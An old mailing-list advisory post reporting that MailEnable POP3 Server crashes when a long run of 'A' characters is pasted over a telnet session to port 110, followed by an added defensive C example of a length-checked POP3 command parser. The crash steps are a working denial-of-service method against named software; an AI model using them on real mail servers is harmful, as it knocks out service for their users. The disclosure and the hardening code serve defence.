MailEnable POP3 Server remote shutdown !:/ -newest ~ (and previous) bufferoverflow-

From: Ketil Braun Larsen (htx01i12@it-college.dk)
Date: Sun Nov 17 2002 - 14:04:09 PST

    (My first post, please bear with me.)
    -/\-About.-/\-
    I found this problem auditing a webserver. It’s a standard buffer overflow,
    I guess, but I am not sure how to find all the technical information. If
    anyone knows what to do I would like to know, if someone has the time to
    send a brief mail or something :)
    
    
    pop3 = mailenabled 
    
    
    -/\-Method-/\-
    
    #telnet xxx.xxx.xxx.xxx 110
    
    (clear screen)
    +OK Welcome to MailEnable POP3 Server
    
    (then copy and paste this- 
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA - and paste it to the 
    terminal)
    
    -/\-Packet Capture-/\-
    
    
    -/\-and so on-/\-
    
    So now you've probably seen all the misspellings and so on; anyway, I hope it
    won’t cloud your mind too much.
    
    
    
    -/\-Me Me Me.-/\-
    Ketil Braun Larsen.
    www.nerds-united.com
    Edu.
    www.It-collge.dk
    
    "Guess that where to late huh?"
    



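For defenders reading this report: a bounded parser for POP3 command lines, shown as an added example (it is not code from the post or from MailEnable). The post does not say which buffer overflowed, so the limits used here are the ones RFC 1939 gives (keywords of 3 or 4 characters, arguments of at most 40); the names `pop3_parse_line` and `pop3_try_user` are hypothetical.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>
#define POP3_MAX_KEYWORD 4   /* RFC 1939: keywords are 3 or 4 characters */
#define POP3_MAX_ARG     40  /* RFC 1939: each argument is at most 40 characters */

enum pop3_parse { POP3_OK, POP3_ERR_EMPTY, POP3_ERR_KEYWORD, POP3_ERR_ARG_LEN, POP3_ERR_BYTE };
struct pop3_cmd { char keyword[POP3_MAX_KEYWORD + 1]; char arg[POP3_MAX_ARG + 1]; };

/* Parse one single-argument client line of `len` bytes (e.g. USER name).
 * Every length is checked before any byte is copied into a fixed buffer. */
enum pop3_parse pop3_parse_line(const char *line, size_t len, struct pop3_cmd *out)
{
    size_t i, klen = 0, alen;
    memset(out, 0, sizeof *out);
    while (len > 0 && (line[len - 1] == '\n' || line[len - 1] == '\r'))
        len--;                                /* accept CRLF or a bare LF */
    if (len == 0) return POP3_ERR_EMPTY;
    while (klen < len && line[klen] != ' ') klen++;
    if (klen < 3 || klen > POP3_MAX_KEYWORD) return POP3_ERR_KEYWORD;
    for (i = 0; i < klen; i++) {
        if (!isalpha((unsigned char)line[i])) return POP3_ERR_KEYWORD;
        out->keyword[i] = (char)toupper((unsigned char)line[i]);
    }
    if (klen == len) return POP3_OK;          /* command without an argument */
    alen = len - klen - 1;
    if (alen > POP3_MAX_ARG) return POP3_ERR_ARG_LEN;   /* refuse, do not truncate */
    for (i = 0; i < alen; i++) {
        unsigned char c = (unsigned char)line[klen + 1 + i];
        if (c < 0x21 || c > 0x7e) return POP3_ERR_BYTE; /* printable ASCII only */
        out->arg[i] = (char)c;
    }
    return POP3_OK;
}

/* Constructed input: "USER " + n 'A' bytes + LF, the shape of line in the report. */
enum pop3_parse pop3_try_user(size_t n, struct pop3_cmd *out)
{
    char line[1024];
    if (n > sizeof line - 6) n = sizeof line - 6;
    memcpy(line, "USER ", 5);
    memset(line + 5, 'A', n);
    line[5 + n] = '\n';
    return pop3_parse_line(line, n + 6, out);
}

int main(void)
{
    struct pop3_cmd c;
    return pop3_try_user(500, &c) == POP3_ERR_ARG_LEN ? 0 : 1;
}
```

A server using this would answer `-ERR` on any non-OK result and keep the session state unchanged.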